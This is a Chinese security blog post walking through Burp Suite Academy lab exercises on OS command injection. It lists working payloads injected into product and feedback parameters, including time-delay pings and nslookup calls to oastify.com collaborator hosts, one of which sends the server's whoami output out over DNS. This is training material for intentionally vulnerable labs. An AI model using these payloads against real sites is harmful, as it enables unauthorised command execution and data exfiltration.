freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

burpsuite官方靶场之命令注入
2024-06-22 21:43:06

1.简单的命令注入

1.1 达成目标

成功执行whoami查看当前用户的名字。

1.2 攻击步骤

观察该靶场的页面,发现这是一个展示其商品信息的页面,点击view details可以展示每个商品的详情。

1692869192_64e72248120be99c1bf35.png!small?1692869193265

来到一个商品的详情页,发现画框部分是检查商品库存的功能。

1692869203_64e722535f30270e97dfe.png!small?1692869204451

对此进行抓包,发现传递了productId和storeId参数。

1692869225_64e7226933c0e5b219bd9.png!small?1692869225959

对productId插入其payload

# payload

%26whoami%26

%26是对&的url编码,因为在http数据包中,&符号用来分隔不同的参数,如果直接使用&那么,会被http数据包当成分割符,因此需要进行url编码,当进行数据传递之后,对此进行解码,使其&生效。

在系统命令中,&符号用来拼接其命令,让拼接的几个命令分别运行。

1692869243_64e7227b4a550dd3f5a50.png!small?1692869243988

1692869253_64e72285f136d88151c16.png!small?1692869254443

2.利用时间延迟的命令盲注

2.1 达成目标

利用命令盲注导致10秒的延迟。

2.2 攻击步骤

来到Submit feedback页面,这是一个给网站提交反馈的页面。因为要向起管理员提交用户反馈,因此很可能使用了sendmail命令。使用该命令向管理员邮箱发送反馈用户的名字,邮箱以及反馈信息等。也正因为是往管理员发送邮件,因此可能网站本身不会有回显。

1692869375_64e722ffd6a06ef3f5f70.png!small?1692869377095

抓取提交反馈的数据包,往email插入payload

# payload

%26ping -c10127.0.0.1%26

1692869389_64e7230dcbe2b546313ab.png!small?1692869390501

1692869399_64e72317ac9bbf0362dcd.png!small?1692869400274

3.利用输出重定向的命令盲注

3.1 达成目标

该靶场存在一个可写的文件夹:/var/www/images

执行whoami命令,将其结果重定向输出到这个文件夹下面,然后检索其内容

3.2 攻击步骤

还是来到提交反馈的页面。

1692869416_64e72328690b9398b04d0.png!small?1692869417240

在提交反馈的时候进行抓包,然后在email输入其payload。

1692869431_64e723378373c8d876f64.png!small?1692869432402

在靶场的主界面观察其数据包,发现了一个image的路径用来加载其图片,该路径传递filename参数。

1692869450_64e7234a52264b37a374e.png!small?1692869451129

1692869459_64e72353f2c3980036b9d.png!small?1692869460465


1692869467_64e7235b92d0e1a39ca78.png!small?1692869468239

4.利用带外通道技术进行命令盲注

4.1 达成目标

利用命令盲注对burpsuite的collaborator发起DNS查询。

4.2 攻击步骤

还是一样的页面,开干。

1692869484_64e7236c6c3ed8b0cd038.png!small?1692869485238


对该页面提交任意的测试数据,然后点击Submit feedback,对此进行抓包。

1692869499_64e7237b3ff65db4e3213.png!small?1692869499983

来到burpsuite的collaborator,激活此功能。

该功能用来充当一个dns查询的服务器,可以把一些在渗透测试中不能直接通过其响应数据探测到的漏洞,通过out-of-band技术,在这里也就是利用collaborator这个集成在burpsutie软件里面的功能,使得通过其响应看不到的漏洞,通过这种方式显形。这个功能就类似于dnslog。

1692869524_64e72394da478400cafeb.png!small?1692869525484

还是一样的,盯死email参数,往该参数插入payload。

1692869541_64e723a562cb0a679ddd1.png!small?1692869541938

# payload

%26nslookup%200no5vo9uebzjpzworih5vhzzyq4hs7gw.oastify.com%26

1692869555_64e723b383f4627963b4c.png!small?1692869556309

1692869563_64e723bbacb094c6f6703.png!small?1692869564297

1692869573_64e723c52e520e6b83383.png!small?1692869573923


1692869580_64e723cc4c7612b160f4c.png!small?1692869580777

5.利用带外通道技术获取系统用户名

5.1 达成目标

利用带外通道技术获取系统用户名。

5.2 攻击步骤

是的,没错,还是一样的页面。

1692869629_64e723fd575109f2f1f3d.png!small?1692869630235

随意提交一些测试数据,然后提交其反馈进行抓包。

1692869642_64e7240a65cfa01c1be03.png!small?1692869642947

一样的,盯死email参数,插入Payload。

# payload

%26nslookup%20`whoami`.wrr1zkdqi73ftv0kvel1zd3v2m8dw4kt.oastify.com%26

在该payload中,``符号也就是键盘的左上角(反引号),该符号应用在系统的shell中那么符号里面的字符是会被当成命令执行的

1692869657_64e7241955635dc1ba1a3.png!small?1692869658297

1692869665_64e7242103a97a4eae1db.png!small?1692869665613

现在,在该下图的按钮中提交我们所获取的用户名。

1692869683_64e724334b6d349681abf.png!small?1692869684318

1692869691_64e7243bebb3fd8558a1c.png!small?1692869692922

# 网络安全 # web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录